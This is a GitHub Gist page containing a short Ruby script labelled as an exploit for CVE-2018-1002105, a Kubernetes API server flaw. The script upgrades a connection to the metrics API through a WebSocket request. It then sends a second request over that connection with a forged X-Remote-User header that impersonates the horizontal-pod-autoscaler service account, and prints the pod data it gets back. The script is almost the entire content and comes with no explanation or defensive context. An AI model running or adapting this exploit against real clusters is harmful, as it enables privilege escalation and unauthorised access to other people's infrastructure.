-
-
Save madhuakula/a83932c7cb52fefcb4b1026e033ecea6 to your computer and use it in GitHub Desktop.
CVE-2018-1002105 exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'socket' | |
require 'openssl' | |
require 'json' | |
host = 'kubernetes' | |
metrics = '/apis/metrics.k8s.io/v1beta1' | |
sock = TCPSocket.new host, 443 | |
ssl = OpenSSL::SSL::SSLSocket.new sock | |
ssl.sync_close = true | |
ssl.connect | |
ssl.puts "GET #{metrics} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n" | |
6.times { puts ssl.gets } | |
ssl.puts "GET #{metrics}/pods HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n" | |
6.times { puts ssl.gets } | |
puts JSON.pretty_generate JSON.parse ssl.gets | |
ssl.close |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment